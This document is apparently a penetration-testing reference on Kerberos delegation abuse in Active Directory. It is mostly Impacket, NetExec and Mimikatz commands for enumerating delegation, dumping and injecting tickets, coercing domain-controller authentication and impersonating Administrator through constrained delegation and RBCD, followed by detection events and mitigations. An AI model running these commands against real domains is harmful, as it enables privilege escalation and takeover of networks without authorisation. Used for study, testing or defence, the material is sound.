Delegation Attacks

Overview

Kerberos delegation allows a service to impersonate a user when accessing other services. Misconfigurations in delegation settings create privilege escalation paths. Three types exist: unconstrained delegation (service receives the user's TGT), constrained delegation (service can request tickets to specific SPNs), and resource-based constrained delegation (RBCD — the target service controls who can delegate to it).

ATT&CK Mapping

• Tactic: TA0005 - Defense Evasion
• Tactic: TA0008 - Lateral Movement
• Technique: T1550.003 - Use Alternate Authentication Material: Pass the Ticket

Prerequisites

• Valid domain credentials for enumeration
• Specific access depends on the delegation type being abused

Techniques

Enumerate Delegation

# Impacket — find all delegation relationships
# https://github.com/fortra/impacket
impacket-findDelegation '<domain>/<user>:<password>' -dc-ip <dc_ip>

# Include disabled accounts
impacket-findDelegation '<domain>/<user>:<password>' -dc-ip <dc_ip> -disabled

# NetExec — find delegation
# https://github.com/Pennyw0rth/NetExec
nxc ldap <dc_ip> -u <user> -p <password> --find-delegation
nxc ldap <dc_ip> -u <user> -p <password> --trusted-for-delegation

Unconstrained Delegation

Computers or services with unconstrained delegation receive and cache the user's TGT when they authenticate. If you compromise a system with unconstrained delegation, you can extract cached TGTs and impersonate those users.

# Find computers with unconstrained delegation
# NetExec
# https://github.com/Pennyw0rth/NetExec
nxc ldap <dc_ip> -u <user> -p <password> --trusted-for-delegation

# PowerShell — find unconstrained delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation
Get-ADUser -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation

After compromising a system with unconstrained delegation:

# Mimikatz — extract cached TGTs
# https://github.com/gentilkiwi/mimikatz
mimikatz# sekurlsa::tickets /export

# Look for Administrator or other high-value TGTs
# Inject the ticket
mimikatz# kerberos::ptt <admin_ticket.kirbi>

Force authentication to the compromised host (to capture a TGT):

# Use printerbug / SpoolSample to coerce DC authentication
# https://github.com/dirkjanm/krbrelayx
python3 printerbug.py '<domain>/<user>:<password>@<dc_ip>' <compromised_host>

Constrained Delegation

Accounts with constrained delegation can request service tickets to specific SPNs on behalf of users using S4U2Self (get a ticket to the service on behalf of a user) then S4U2Proxy (delegate to the target SPN). Two modes exist: "Kerberos only" requires the user to have actually authenticated via Kerberos (S4U2Self does not produce forwardable tickets), while "with protocol transition" allows impersonation without prior Kerberos authentication. Users in the Protected Users group or marked "sensitive and cannot be delegated" cannot be impersonated.

# Impacket — abuse constrained delegation to get a ticket as Administrator
# https://github.com/fortra/impacket
impacket-getST '<domain>/<service_account>:<password>' -spn 'cifs/<target>' -impersonate Administrator -dc-ip <dc_ip>

# With hash
impacket-getST '<domain>/<service_account>' -hashes ':<ntlm_hash>' -spn 'cifs/<target>' -impersonate Administrator -dc-ip <dc_ip>

# Use the ticket
export KRB5CCNAME=Administrator@cifs_<target>@<DOMAIN>.ccache
impacket-psexec '<domain>/Administrator@<target>' -k -no-pass

The -altservice flag can override the SPN in the resulting ticket (the alternative service must run on the same host as the original SPN):

# Impacket — request for one SPN but change it to another
# https://github.com/fortra/impacket
impacket-getST '<domain>/<service_account>:<password>' -spn 'cifs/<target>' -impersonate Administrator -altservice 'ldap/<target>' -dc-ip <dc_ip>

Resource-Based Constrained Delegation (RBCD)

RBCD allows the target resource to define which accounts can delegate to it via the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. If you can write to this attribute on a target computer, you can configure RBCD to impersonate any user.

Requirements: - Write permission to the target computer's msDS-AllowedToActOnBehalfOfOtherIdentity - A computer account you control (or ability to create one — default MachineAccountQuota is 10)

# Step 1 — Add a computer account you control
# Impacket
# https://github.com/fortra/impacket
impacket-addcomputer '<domain>/<user>:<password>' -computer-name 'FAKE01$' -computer-pass 'Password123' -dc-ip <dc_ip>

# Step 2 — Set RBCD on the target computer
# Impacket
# https://github.com/fortra/impacket
impacket-rbcd '<domain>/<user>:<password>' -delegate-to '<target_computer>$' -delegate-from 'FAKE01$' -action write -dc-ip <dc_ip>

# Step 3 — Request service ticket as Administrator via S4U
# Impacket
# https://github.com/fortra/impacket
impacket-getST '<domain>/FAKE01$:Password123' -spn 'cifs/<target_computer>' -impersonate Administrator -dc-ip <dc_ip>

# Step 4 — Use the ticket
export KRB5CCNAME=Administrator@cifs_<target_computer>@<DOMAIN>.ccache
impacket-psexec '<domain>/Administrator@<target_computer>' -k -no-pass

Detection Methods

Network-Based Detection

• S4U2Self and S4U2Proxy Kerberos requests from unusual accounts
• TGS requests for high-privilege users from service accounts

Host-Based Detection

• Changes to msDS-AllowedToActOnBehalfOfOtherIdentity attribute
• New computer accounts created (Event 4741)
• Windows Security Event 4769 with delegation flags

Mitigation Strategies

• Minimize delegation — remove delegation where not required
• Protected Users group — members cannot be delegated
• Mark sensitive accounts — set "Account is sensitive and cannot be delegated" for admin accounts
• Monitor MachineAccountQuota — reduce from default 10 to 0 if not needed
• Audit attribute changes — monitor msDS-AllowedToActOnBehalfOfOtherIdentity modifications

References

Official Documentation

• Impacket
• Mimikatz

MITRE ATT&CK

• T1550.003 - Use Alternate Authentication Material: Pass the Ticket